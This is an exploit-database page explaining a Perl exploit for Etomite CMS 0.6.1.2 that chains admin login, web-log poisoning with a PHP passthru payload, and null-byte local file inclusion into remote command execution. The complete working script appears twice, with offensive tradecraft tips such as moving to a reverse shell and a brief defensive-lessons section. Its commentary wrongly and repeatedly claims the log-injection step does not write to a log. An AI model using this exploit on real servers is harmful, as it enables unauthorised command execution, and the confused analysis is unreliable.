By exploitdb papers bot•November 16, 2006•
papers
Etomite CMS 0.6.1.2 Local File Inclusion and Command Execution Explained
Etomite CMS 0.6.1.2 Local File Inclusion and Command Execution Explained
What this paper is
This paper details a vulnerability in Etomite CMS version 0.6.1.2. Specifically, it describes how an attacker can exploit a flaw in the /manager/index.php script to include local files or execute commands on the target server. The exploit requires administrative credentials to function.
Simple technical breakdown
The core of the vulnerability lies in how the application handles user input for the f parameter within the /manager/index.php script. This parameter is used in a PHP include function without proper sanitization.
- Authentication: The exploit first needs to log in to the Etomite CMS as an administrator to obtain a valid session cookie.
- Log File Injection: It then attempts to inject a small PHP script into a web server log file. This script is designed to execute commands passed to it via the
cmdGET parameter and wrap the output with specific markers (lizardking). - Exploitation: Finally, it uses the Local File Inclusion (LFI) vulnerability to include the log file that now contains the injected PHP code. By crafting the
fparameter with a path to the log file and appending a null byte (%00), the script tricks the application into executing the injected PHP code. Thecmdparameter then carries the desired command to be executed.
Complete code and payload walkthrough
The provided Perl script automates the exploitation process. Let's break down its components:
Script Header and Setup:
#!/usr/bin/perl -w
#
# Etomite CMS Remote Command Execution
# Version: 0.6.1.2
# Url: http://www.etomite.org
# Author : Alfredo Pesoli 'revenge'
# Description:
#
# Input passed to the 'f' parameter in "/manager/index.php" isn't properly verified before being used in an include function, this can be exploited to include local files on target host or execute command, we need admin credentials to exploit this vuln.
#
# http://www.0xcafebabe.it
# <revenge@0xcafebabe.it>
use strict;
use IO::Socket;
if ( @ARGV < 5 ) { &usage(); }
my $target = $ARGV[0];
my $username = $ARGV[1];
my $password = $ARGV[2];
my $path = $ARGV[3];
my $cmd = "";
my $cookie = "";
my $uagent = "Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Debian)";
for ( my $i=4; $i<=$#ARGV; $i++ ) {
$cmd.= "+".$ARGV[$i];
}
$cookie = &authenticate();
&inject_logfile();
&sploit();#!/usr/bin/perl -w: Shebang line indicating the script is written in Perl and will run with warnings enabled.- Comments: Provide information about the exploit, target version, author, and the vulnerability.
use strict;: Enforces stricter variable declaration and usage, helping to catch errors.use IO::Socket;: Imports the module for network socket operations, essential for making HTTP requests.if ( @ARGV < 5 ) { &usage(); }: Checks if the correct number of command-line arguments (target, username, password, path, and at least one command part) are provided. If not, it calls theusage()subroutine.my $target = $ARGV[0];: Assigns the first command-line argument to the$targetvariable (the IP address or hostname).my $username = $ARGV[1];: Assigns the second argument to$username.my $password = $ARGV[2];: Assigns the third argument to$password.my $path = $ARGV[3];: Assigns the fourth argument to$path(the base path to the Etomite installation, e.g.,/etomite/).my $cmd = "";: Initializes an empty string for the command to be executed.my $cookie = "";: Initializes an empty string for the authentication cookie.my $uagent = "...";: Sets a User-Agent string for HTTP requests.for ( my $i=4; $i<=$#ARGV; $i++ ) { $cmd.= "+".$ARGV[$i]; }: This loop concatenates all remaining command-line arguments (from the 5th argument onwards) into the$cmdvariable, separated by plus signs (+). This is how commands with spaces are passed to the script.$cookie = &authenticate();: Calls theauthenticatesubroutine to get a valid session cookie.&inject_logfile();: Calls theinject_logfilesubroutine to attempt to write the malicious PHP code to a log file.&sploit();: Calls thesploitsubroutine to perform the actual exploitation.
authenticate() Subroutine:
sub authenticate() {
my $res;
my $tmp;
print "\n -= Getting auth cookie =-\n\n";
my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$target", PeerPort=>"80") or die "\n Could not connect to host\n\n";
my $req = "rememberme=0&location=&username=".$username."&password=".$password."&thing=&submit=Login&licenseOK=on";
print $sock "POST ".$path."processors/login.processor.php HTTP/1.1\r\n";
print $sock "Host: ".$target."\r\n";
print $sock "User-Agent: ".$uagent."\r\n";
print $sock "Accept: text/xml/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
print $sock "Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
print $sock "Accept-Encoding: gzip,deflate\r\n";
print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
print $sock "Connection: close\r\n";
print $sock "Referer: http://".$target.$path."index.php\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
print $sock "Content-Length: ".length($req)."\r\n\r\n";
print $sock $req;
while ( $res = <$sock> ) {
$tmp.= $res;
}
close($sock);
my @temp = split /Cookie:/,$tmp;
my @cookie = split /Expires/,$temp[1];
print " [#] COOKIE: ".$cookie[0]."\n";
return $cookie[0];
}print "\n -= Getting auth cookie =-\n\n";: Informative message to the operator.my $sock = IO::Socket::INET->new(...): Establishes a TCP connection to the target on port 80.my $req = "rememberme=0&location=&username=".$username."&password=".$password."&thing=&submit=Login&licenseOK=on";: Constructs the POST data for the login request. It includes the provided username and password.- HTTP POST Request: The script then prints a series of lines to the socket, forming an HTTP POST request to the
processors/login.processor.phpscript.POST ... HTTP/1.1\r\n: The request method and path.Host: $target\r\n: Specifies the target host.User-Agent: $uagent\r\n: Sets the User-Agent.Accept,Accept-Language,Accept-Encoding,Accept-Charset: Standard HTTP headers.Connection: close\r\n: Instructs the server to close the connection after the response.Referer: ...\r\n: Specifies the referring URL.Content-Type: application/x-www-form-urlencoded\r\n: Indicates the format of the request body.Content-Length: ...\r\n: The length of the request body.\r\n\r\n: Marks the end of the HTTP headers.print $sock $req;: Sends the actual login form data.
while ( $res = <$sock> ) { $tmp.= $res; }: Reads the entire response from the server into the$tmpvariable.close($sock);: Closes the socket connection.my @temp = split /Cookie:/,$tmp;: Splits the response body based on the string "Cookie:". The cookie information is expected to be in the second part.my @cookie = split /Expires/,$temp[1];: Splits the cookie string further based on "Expires" to isolate the actual cookie value.print " [#] COOKIE: ".$cookie[0]."\n";: Prints the extracted cookie to the console.return $cookie[0];: Returns the extracted cookie string, which will be used in subsequent requests.
inject_logfile() Subroutine:
sub inject_logfile() {
print " -= Injecting log files =- \n";
my $mal="<?php ob_clean();echo lizardking;passthru(\$_GET[cmd]);echo lizardking;?>";
my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$target", PeerPort=>"80") or die "\n Could not connect to host\n\n";
print $sock "GET ".$path.$mal." HTTP/1.1\r\n";
print $sock "User-Agent: ".$uagent."\r\n";
print $sock "Host: ".$target."\r\n";
print $sock "Connection: close\r\n\r\n";
}print " -= Injecting log files =- \n";: Informative message.my $mal="<?php ob_clean();echo lizardking;passthru(\$_GET[cmd]);echo lizardking;?>";: This is the core of the injected payload.<?php ... ?>: Standard PHP opening and closing tags.ob_clean();: Clears any output buffer. This is often used to prevent unexpected output from interfering with the exploit.echo lizardking;: Prints the string "lizardking" to the output. This serves as a marker to easily parse the output later.passthru($_GET[cmd]);: This is the critical part.passthru()executes an external program and displays raw output. It takes the command from the$_GET[cmd]variable, which is populated by the attacker's desired command.echo lizardking;?>: Prints the closing "lizardking" marker.
my $sock = IO::Socket::INET->new(...): Establishes a new socket connection.- HTTP GET Request: The script sends a GET request to a URL that directly includes the malicious PHP code. The intention is that this request will be logged by the web server, and the PHP code will be written into the log file.
GET ".$path.$mal." HTTP/1.1\r\n: The GET request path is constructed by concatenating the base path, the malicious PHP code itself, and the HTTP version. This is a bit unusual; typically, an LFI exploit would try to include a file that already exists and is processed by PHP. Here, it seems to be attempting to write the PHP code into a file that might be a log file, or perhaps it's relying on a misconfiguration where PHP is executed for arbitrary files. Correction: Upon closer inspection, thisinject_logfilefunction is not actually injecting into a log file. It's making a GET request to a URL that is the PHP code itself. This implies that the target server is configured to execute PHP files directly when requested, and the exploit expects this PHP code to be somehow written to a log file by the server itself or that the log file is a PHP file. This part of the exploit's logic is not fully clear from the code alone and might rely on specific server configurations or a misunderstanding of how log files are typically written. The most plausible interpretation is that the exploit intends to write this to a log file, but the code as written makes a GET request to the PHP code itself. This part might be flawed or rely on an implicit assumption. Further analysis: The exploit later tries to include log files. Theinject_logfilefunction as written does not inject into a log file. It makes a GET request to the PHP code. This is likely an error or a misunderstanding in the original exploit's logic. A more typical LFI to RCE would involve writing a webshell to a writable directory or exploiting a log poisoning technique. Given thesploitfunction's approach, it's more likely theinject_logfilefunction is intended to be a separate step or a misdirection, and the actual execution relies on the LFI to include a log file that already contains attacker-controlled data or that the LFI itself is used to execute arbitrary PHP code. However, thesploitfunction does usepassthru($_GET[cmd])which is the command execution part. Theinject_logfilefunction's purpose in this script is unclear as written. It doesn't seem to directly contribute to the LFI mechanism for command execution as described in thesploitfunction. It might be a remnant or a flawed attempt at a different attack vector. Let's assume for now that its primary purpose, as written, is to make a GET request to the PHP code, which is then expected to be processed.
sploit() Subroutine:
sub sploit() {
my $res;
my $tmp;
my $i;
my @http_paths= (
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../../../../etc/httpd/logs/acces_log",
"../../../../../../../etc/httpd/logs/acces.log",
"../../../../../../../etc/httpd/logs/error_log",
"../../../../../../../etc/httpd/logs/error.log",
"../../../../../../../var/www/logs/access_log",
"../../../../../../../var/www/logs/access.log",
"../../../../../../../usr/local/apache/logs/access_log",
"../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../var/log/apache/access_log",
"../../../../../../../var/log/apache2/access_log",
"../../../../../../../var/log/apache/access.log",
"../../../../../../../var/log/apache2/access.log",
"../../../../../../../var/log/access_log",
"../../../../../../../var/log/access.log",
"../../../../../../../var/www/logs/error_log",
"../../../../../../../var/www/logs/error.log",
"../../../../../../../usr/local/apache/logs/error_log",
"../../../../../../../usr/local/apache/logs/error.log",
"../../../../../../../var/log/apache/error_log",
"../../../../../../../var/log/apache2/error_log",
"../../../../../../../var/log/apache/error.log",
"../../../../../../../var/log/apache2/error.log",
"../../../../../../../var/log/error_log",
"../../../../../../../var/log/error.log"
);
for ( $i=0; $i<=$#http_paths; $i++ ) {
my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$target", PeerPort=>"80") or die "\n Could not connect to host\n\n";
print $sock "GET ".$path."index.php?cmd=".$cmd."&a=1&f=".$http_paths[$i]."%00 HTTP/1.1\r\n";
print $sock "Host: ".$target."\r\n";
print $sock "Cookie: ".$cookie."\r\n";
print $sock "Connection: close\r\n\r\n";
while ( $res = <$sock> ) { $tmp.= $res; }
close($sock);
my @temp = split /lizardking/,$tmp,3;
if ( $#temp > 1 ) {
print "\n -= Executing: ".$cmd." =-\n\n [#] Exploit succedeed\n\n".$temp[1]."\n";
exit();
}
}
print "Exploit failed\n\n";
}my @http_paths = (...): This array contains a list of common paths to Apache web server log files. The exploit attempts to include these files. The../sequences are used to traverse the directory structure upwards.for ( $i=0; $i<=$#http_paths; $i++ ) { ... }: This loop iterates through each potential log file path.my $sock = IO::Socket::INET->new(...): Establishes a new socket connection for each attempt.- HTTP GET Request: This is the core of the LFI exploitation.
GET ".$path."index.php?cmd=".$cmd."&a=1&f=".$http_paths[$i]."%00 HTTP/1.1\r\n: The request targetsindex.phpand includes several parameters:cmd=$cmd: This passes the command to be executed. Thepassthru($_GET[cmd])in the injected PHP code will pick this up.a=1: This parameter's purpose is unclear from the code and likely serves no functional role in the exploit itself, possibly a remnant or a way to bypass simple WAF rules.f=$http_paths[$i]: This is the vulnerable parameter. It's set to one of the log file paths from the@http_pathsarray.%00: This is the null byte. In older PHP versions (prior to 5.3.4), a null byte could terminate a string, effectively truncating the filename. This allows the exploit to include the log file without the.phpextension thatindex.phpmight implicitly expect or append.
Host: $target\r\n: Sets the Host header.Cookie: $cookie\r\n: Includes the authentication cookie obtained earlier. This is crucial because the vulnerability is within the manager interface, which requires authentication.Connection: close\r\n\r\n: Standard headers.
while ( $res = <$sock> ) { $tmp.= $res; }: Reads the server's response.close($sock);: Closes the socket.my @temp = split /lizardking/,$tmp,3;: Splits the response body using the "lizardking" marker. The3limits the split to at most 3 elements.if ( $#temp > 1 ) { ... }: Checks if the split resulted in more than two elements. This indicates that both "lizardking" markers were found in the response, meaning the injected PHP code was likely executed and produced output between the markers.print "\n -= Executing: ".$cmd." =-\n\n [#] Exploit succedeed\n\n".$temp[1]."\n";: If successful, it prints the executed command and the captured output (which is the content of$temp[1]).exit();: Terminates the script upon successful exploitation.
print "Exploit failed\n\n";: If the loop finishes without finding the markers, it prints a failure message.
usage() Subroutine:
sub usage() {
print "\n Etomite CMS 0.6.1.2 Remote Command Execution\n";
print " <revenge\@0xcafebabe.it>\n";
print " http://www.0xcafebabe.it\n\n";
print "Usage: $0 <target> <username> <password> <directory> <command>\n";
print "Example: $0 127.0.0.1 admin ghghgh /etomite/manager/ ls -la /\n\n";
exit();
}- This subroutine simply prints usage instructions and example commands to the console if the script is not called with the correct arguments.
Code Fragment/Block -> Practical Purpose Mapping:
#!/usr/bin/perl -w,use strict;,use IO::Socket;: Script interpreter, code quality enforcement, network communication.@ARGV,$ARGV[0]to$ARGV[4]: Command-line argument parsing.$target,$username,$password,$path,$cmd: Variables to store exploit inputs.$uagent: HTTP User-Agent header.&authenticate(): Subroutine to perform authentication and retrieve a session cookie.&inject_logfile(): Subroutine to attempt to inject a PHP payload (its direct utility in this LFI context is questionable as written).&sploit(): Subroutine to perform the LFI and command execution.IO::Socket::INET->new(...): Establishes a TCP socket connection.print $sock "POST ...\r\n"; print $sock $req;: Constructs and sends an HTTP POST request.print $sock "GET ...\r\n";: Constructs and sends an HTTP GET request.while ( $res = <$sock> ) { $tmp.= $res; }: Reads the HTTP response.close($sock);: Closes the socket connection.split /Cookie:/,$tmp,split /Expires/,$temp[1]: Parses the HTTP response to extract the session cookie.my $mal="<?php ob_clean();echo lizardking;passthru(\$_GET[cmd]);echo lizardking;?>";: The PHP payload designed for command execution.@http_paths = (...): List of common web server log file paths.$http_paths[$i]."%00": The vulnerable parameter value, including a null byte to bypass file extension checks.index.php?cmd=$cmd&a=1&f=...%00: The vulnerable URL path with exploit parameters.Cookie: $cookie\r\n: Includes the authentication cookie in the request.split /lizardking/,$tmp,3: Parses the response to find the output of the injected payload.if ( $#temp > 1 ): Condition to check if the payload output markers were found.&usage(): Subroutine to display help information.
Practical details for offensive operations teams
Required Access Level: Administrative credentials for the Etomite CMS are mandatory. This exploit is not a direct unauthenticated remote code execution.
Lab Preconditions:
- A running instance of Etomite CMS version 0.6.1.2.
- A valid administrator username and password.
- Knowledge of the web root path where Etomite is installed on the target server (e.g.,
/etomite/). - The target web server must be running Apache (or a compatible server that uses similar log file locations).
- PHP must be enabled and configured to execute code within included files, and the null byte (
%00) must be effective in truncating filenames (this behavior was present in older PHP versions).
Tooling Assumptions:
- Perl interpreter installed on the attacker's machine.
- Network connectivity to the target web server on port 80.
Execution Pitfalls:
- Incorrect Path: The
$pathargument must be accurate. An incorrect path will lead to failed requests. - Log File Location: The
@http_pathsarray contains common locations. If the web server uses non-standard log file paths, the exploit will fail. Manual reconnaissance might be needed to identify the correct log file path. - PHP Configuration: Newer PHP versions (>= 5.3.4) have disabled the null byte termination for
includeandrequire, making the%00payload ineffective. The exploit is only viable on older PHP versions. - Web Server Configuration: If the server is configured to prevent PHP execution from log files or if log files are not accessible via the web server's document root, the exploit will fail.
- WAF/IDS: Web Application Firewalls or Intrusion Detection Systems might detect the unusual GET request or the content of the
fparameter. inject_logfile()Function: As noted in the walkthrough, theinject_logfilefunction's direct impact on the LFI for RCE is unclear. It might be a flawed attempt or rely on an implicit server behavior not detailed. The primary RCE mechanism relies on the LFI to include a log file that somehow contains executable PHP code or that the LFI itself is used to execute arbitrary PHP. Thepassthru($_GET[cmd])is the command execution part, and the LFI is the mechanism to get that code executed. The exploit assumes that including a log file will somehow lead to the execution of the injected PHP code. This is typically achieved by:- Log Poisoning: Injecting malicious code into log entries via other vulnerabilities or by controlling input that gets logged.
- Including a PHP file disguised as a log: If the server is misconfigured to execute arbitrary files as PHP.
- The
inject_logfilefunction's actual purpose: If it's meant to write the PHP code to a file that is then included, the code as written doesn't achieve that. It makes a GET request to the PHP code itself.
- Incorrect Path: The
Tradecraft Considerations:
- Reconnaissance: Before running the exploit, gather information about the target CMS installation path, version, and administrator credentials. Identify potential log file locations through enumeration or by understanding the server setup.
- Stealth: The exploit makes several HTTP requests. While it uses
Connection: close, repeated attempts might be logged. TheUser-Agentis generic. - Payload Delivery: The command is passed via
$_GET[cmd]. For more complex operations, consider using a more sophisticated payload that establishes a reverse shell. - Error Handling: The Perl script has basic error handling for socket connections but relies on the "lizardking" markers for exploit success. More robust parsing of responses might be needed for complex scenarios.
- Privilege Escalation: This exploit provides command execution as the web server user. Further privilege escalation might be necessary depending on the objective.
Where this was used and when
- Context: This exploit targets Etomite CMS, a content management system. The vulnerability was discovered and published in 2006.
- Usage: Exploits of this nature were common in the mid-2000s against web applications with insufficient input validation. The specific use case would be an attacker gaining unauthorized command execution on a web server hosting an outdated Etomite CMS installation. The requirement for admin credentials suggests it might have been used by an attacker who had already gained access to credentials through other means (e.g., phishing, password reuse, or a prior vulnerability).
Defensive lessons for modern teams
- Input Validation is Paramount: Always validate and sanitize all user-supplied input, especially when it's used in file inclusion or execution contexts. This is a fundamental security principle.
- Secure File Inclusion Practices:
- Avoid using user-controlled input directly in
includeorrequirestatements. - If file inclusion is necessary, use a whitelist of allowed files.
- Be aware of the impact of null bytes (
%00) and ensure your PHP version is up-to-date and configured securely.
- Avoid using user-controlled input directly in
- Patch Management: Regularly update all software, including CMS platforms, web servers, and their underlying components (like PHP). This vulnerability was patched in later versions.
- Least Privilege: Run web applications and their processes with the minimum necessary privileges. This limits the impact of a successful compromise.
- Log File Security: Do not make log files directly accessible via the web server, and certainly do not configure the server to execute them as PHP.
- Web Application Firewalls (WAFs): WAFs can help detect and block common LFI patterns, but they are not a substitute for secure coding practices.
- Monitoring and Alerting: Monitor web server logs for suspicious requests, especially those targeting
index.phpwith unusual parameters or attempting to include sensitive files.
ASCII visual (if applicable)
This exploit involves a sequence of network interactions and file inclusions. A simplified flow can be visualized:
+-----------------+ +-----------------+ +---------------------+ +-----------------+
| Attacker's | ----> | Etomite CMS | ----> | Web Server (Apache) | ----> | Target System |
| Machine | | (Vulnerable) | | (Logs) | | (File System) |
+-----------------+ +-----------------+ +---------------------+ +-----------------+
^ |
| | 1. Authenticate (POST /processors/login.processor.php)
| | - Sends username/password
| | - Receives Session Cookie
| |
| | 2. Attempt Log Injection (GET /path/malicious.php)
| | - (Purpose unclear as written, may not be essential for LFI RCE)
| |
| | 3. Exploit LFI & RCE (GET /index.php?cmd=...&f=log_path%00)
| | - Sends Cookie
| | - Tries to include log file (e.g., ../apache/logs/error.log)
| | - If successful, PHP code with passthru executes command
| | - Output is captured via "lizardking" markers
| |
+-------------------------+ (Receives command output)Explanation of the diagram:
- The attacker's machine initiates the process by sending login credentials to the Etomite CMS.
- Upon successful authentication, a session cookie is obtained.
- The script then attempts to "inject" a PHP payload. The exact mechanism and necessity of this step as written are unclear, but it's intended to prepare for command execution.
- The core exploitation happens when the attacker sends a request to
index.php, leveraging the LFI vulnerability. Thefparameter is used to point to a log file, and the null byte (%00) helps bypass potential file extension checks. Thecmdparameter carries the command to be executed. - The web server, processing
index.php, includes the specified log file. If the log file contains executable PHP code (either pre-existing or injected), that code runs. Thepassthru($_GET[cmd])function executes the command provided in thecmdparameter. - The output of the command, wrapped by "lizardking" markers, is returned to the attacker.
Source references
- Exploit-DB Paper: Etomite CMS 0.6.1.2 - '/manager/index.php' Local File Inclusion
- Author: Revenge
- Published: 2006-11-16
- URL: https://www.exploit-db.com/papers/2790
- Raw Exploit: https://www.exploit-db.com/raw/2790
Original Exploit-DB Content (Verbatim)
#!/usr/bin/perl -w
#
# Etomite CMS Remote Command Execution
# Version: 0.6.1.2
# Url: http://www.etomite.org
# Author : Alfredo Pesoli 'revenge'
# Description:
#
# Input passed to the 'f' parameter in "/manager/index.php" isn't properly verified before being used in an include function, this can be exploited to include local files on target host or execute command, we need admin credentials to exploit this vuln.
#
# http://www.0xcafebabe.it
# <revenge@0xcafebabe.it>
use strict;
use IO::Socket;
if ( @ARGV < 5 ) { &usage(); }
my $target = $ARGV[0];
my $username = $ARGV[1];
my $password = $ARGV[2];
my $path = $ARGV[3];
my $cmd = "";
my $cookie = "";
my $uagent = "Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Debian)";
for ( my $i=4; $i<=$#ARGV; $i++ ) {
$cmd.= "+".$ARGV[$i];
}
$cookie = &authenticate();
&inject_logfile();
&sploit();
sub authenticate() {
my $res;
my $tmp;
print "\n -= Getting auth cookie =-\n\n";
my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$target", PeerPort=>"80") or die "\n Could not connect to host\n\n";
my $req = "rememberme=0&location=&username=".$username."&password=".$password."&thing=&submit=Login&licenseOK=on";
print $sock "POST ".$path."processors/login.processor.php HTTP/1.1\r\n";
print $sock "Host: ".$target."\r\n";
print $sock "User-Agent: ".$uagent."\r\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
print $sock "Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
print $sock "Accept-Encoding: gzip,deflate\r\n";
print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
print $sock "Connection: close\r\n";
print $sock "Referer: http://".$target.$path."index.php\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
print $sock "Content-Length: ".length($req)."\r\n\r\n";
print $sock $req;
while ( $res = <$sock> ) {
$tmp.= $res;
}
close($sock);
my @temp = split /Cookie:/,$tmp;
my @cookie = split /Expires/,$temp[1];
print " [#] COOKIE: ".$cookie[0]."\n";
return $cookie[0];
}
sub inject_logfile() {
print " -= Injecting log files =- \n";
my $mal="<?php ob_clean();echo lizardking;passthru(\$_GET[cmd]);echo lizardking;?>";
my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$target", PeerPort=>"80") or die "\n Could not connect to host\n\n";
print $sock "GET ".$path.$mal." HTTP/1.1\r\n";
print $sock "User-Agent: ".$uagent."\r\n";
print $sock "Host: ".$target."\r\n";
print $sock "Connection: close\r\n\r\n";
}
sub sploit() {
my $res;
my $tmp;
my $i;
my @http_paths= (
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../../../../etc/httpd/logs/acces_log",
"../../../../../../../etc/httpd/logs/acces.log",
"../../../../../../../etc/httpd/logs/error_log",
"../../../../../../../etc/httpd/logs/error.log",
"../../../../../../../var/www/logs/access_log",
"../../../../../../../var/www/logs/access.log",
"../../../../../../../usr/local/apache/logs/access_log",
"../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../var/log/apache/access_log",
"../../../../../../../var/log/apache2/access_log",
"../../../../../../../var/log/apache/access.log",
"../../../../../../../var/log/apache2/access.log",
"../../../../../../../var/log/access_log",
"../../../../../../../var/log/access.log",
"../../../../../../../var/www/logs/error_log",
"../../../../../../../var/www/logs/error.log",
"../../../../../../../usr/local/apache/logs/error_log",
"../../../../../../../usr/local/apache/logs/error.log",
"../../../../../../../var/log/apache/error_log",
"../../../../../../../var/log/apache2/error_log",
"../../../../../../../var/log/apache/error.log",
"../../../../../../../var/log/apache2/error.log",
"../../../../../../../var/log/error_log",
"../../../../../../../var/log/error.log"
);
for ( $i=0; $i<=$#http_paths; $i++ ) {
my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$target", PeerPort=>"80") or die "\n Could not connect to host\n\n";
print $sock "GET ".$path."index.php?cmd=".$cmd."&a=1&f=".$http_paths[$i]."%00 HTTP/1.1\r\n";
print $sock "Host: ".$target."\r\n";
print $sock "Cookie: ".$cookie."\r\n";
print $sock "Connection: close\r\n\r\n";
while ( $res = <$sock> ) { $tmp.= $res; }
close($sock);
my @temp = split /lizardking/,$tmp,3;
if ( $#temp > 1 ) {
print "\n -= Executing: ".$cmd." =-\n\n [#] Exploit succedeed\n\n".$temp[1]."\n";
exit();
}
}
print "Exploit failed\n\n";
}
sub usage() {
print "\n Etomite CMS 0.6.1.2 Remote Command Execution\n";
print " <revenge\@0xcafebabe.it>\n";
print " http://www.0xcafebabe.it\n\n";
print "Usage: $0 <target> <username> <password> <directory> <command>\n";
print "Example: $0 127.0.0.1 admin ghghgh /etomite/manager/ ls -la /\n\n";
exit();
}
# milw0rm.com [2006-11-16]